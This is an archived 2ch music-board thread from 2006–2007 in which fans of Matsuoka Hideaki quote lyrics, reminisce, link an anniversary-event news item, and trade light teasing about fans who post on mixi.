175 :NO MUSIC NO NAME:2006/11/24(金) 22:36:52 ID:mNUZkdNa
♪商店街の角の小さな花屋も

176 :NO MUSIC NO NAME:2006/11/25(土) 00:11:05 ID:wnqMIyNr
それ今日カラオケで歌ったぉ(^ω^)

177 :NO MUSIC NO NAME:2006/12/01(金) 13:11:30 ID:BPBikpI0
15年経ってもやっぱりローソンの唄のサビの半拍ずれについていけなかったのは年寄りの証拠ですか?
あ、学生の時もついていけなかったんだからもっと根本的な問題か。

178 :NO MUSIC NO NAME:2006/12/01(金) 20:35:49 ID:Na1WdrXA
そんなに〜あせっちゃ〜だ〜め〜さ〜
そんなに〜きみはきれい〜な〜の〜に〜
こいするきもちに〜きづいて〜
ウォ〜ウォ〜

179 :NO MUSIC NO NAME:2006/12/10(日) 22:24:59 ID:uYwMOPQf
【音楽】松岡英明(38)、安藤秀樹(44)の仲良し2人が合同で20周年イベント!
http://news18.2ch.net/test/read.cgi/mnewsplus/1165755062/

180 :NO MUSIC NO NAME:2006/12/10(日) 22:26:17 ID:uYwMOPQf
ageてしまったorz

181 :NO MUSIC NO NAME:2006/12/17(日) 21:45:06 ID:Hqj5e/B8
スレ墜ちちゃったね。































必然だけど。

182 :NO MUSIC NO NAME:2006/12/24(日) 14:48:04 ID:Z2ohi4Mf
昨日が誕生日だったと言う事を完全に忘れていた

183 :NO MUSIC NO NAME:2006/12/25(月) 13:51:44 ID:acXU1vKe
イブイブが懐かしい。


ポップオンポップも懐かしい。

184 :NO MUSIC NO NAME:2006/12/26(火) 00:32:24 ID:dVvK0PYf
♪子供の頃はいつも
ヘラクレスと闇を飛べたのに〜

185 :NO MUSIC NO NAME:2006/12/26(火) 10:31:30 ID:Iu1sW2cn
mixiの松岡スレで、LIVEのたびにカキコしてる女がいるけど、
末に「mixiありがとう」と声をかけられたことを自慢にしてる女が居る。
みぃとか言う女。
狙ってるんかな。

186 :NO MUSIC NO NAME:2006/12/29(金) 23:19:27 ID:LWoQl/mD
>>185
それがどうしたの?
妬いてるの?

187 :NO MUSIC NO NAME:2006/12/30(土) 09:06:22 ID:YSrL83sx
mixiの末のサイトに書き込んでるヤシら、みんな妖精ばかりw

188 :NO MUSIC NO NAME:2006/12/30(土) 12:04:33 ID:TM8rMP37
妖精いいな。

189 :NO MUSIC NO NAME:2006/12/31(日) 15:51:20 ID:EA3tARqt
妬いてるー?
ハゲに誰が?

190 :NO MUSIC NO NAME:2007/01/01(月) 22:12:07 ID:7YgBt5cY
↑図星か★

191 :NO MUSIC NO NAME:2007/01/02(火) 02:33:52 ID:Qi0Mr5Sm
一回喰われればいんじゃね?w

192 :NO MUSIC NO NAME:2007/01/03(水) 15:17:33 ID:s4zA8n3q
俺は男だよ。妖精を助けるんだよ!

193 :NO MUSIC NO NAME:2007/01/03(水) 18:08:20 ID:Ktlu7COc
はむれっとのともだち

194 :NO MUSIC NO NAME:2007/01/03(水) 19:25:05 ID:lOUSoStD
男だろうが妖精だろうがハム友だろうが、
みんな一回喰われてしまえ!www

195 :NO MUSIC NO NAME:2007/01/04(木) 21:41:40 ID:X1Od+O2T
 

196 :NO MUSIC NO NAME:2007/01/06(土) 23:53:34 ID:O/S/6ioF
モヤシっ子松坊

197 :NO MUSIC NO NAME:2007/01/08(月) 23:21:24 ID:8EkW+llg
まつぼっくり

198 :NO MUSIC NO NAME:2007/01/28(日) 00:57:43 ID:mK2pCxLH
ぼったくり?w

199 :NO MUSIC NO NAME:2007/02/11(日) 01:51:48 ID:Ajqaq/NF
ぎゃくぅしゅ〜

200 :NO MUSIC NO NAME:2007/02/11(日) 03:13:09 ID:Ajqaq/NF
へいがる すたでぃ あふたすくーる

201 :NO MUSIC NO NAME:2007/02/16(金) 02:22:30 ID:D/P/P53R
こんな書き込みしかないって事は風化しつつあるって事なんだろうな

202 :NO MUSIC NO NAME:2007/02/20(火) 16:21:44 ID:dbEjD8Hv
吉川晃司ネタだが、、、、
Tour Members:
Gt. 弥吉淳二
Gt. 菊池英昭(ex. THE YELLOW MONKEY)
Ba. 小池ヒロミチ
Key. ホッピー神山
Drs. 坂東慧(T-Square)

ツインギターってはじめてかな?
ボーカルに専念するツアーだな
どう??


30 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)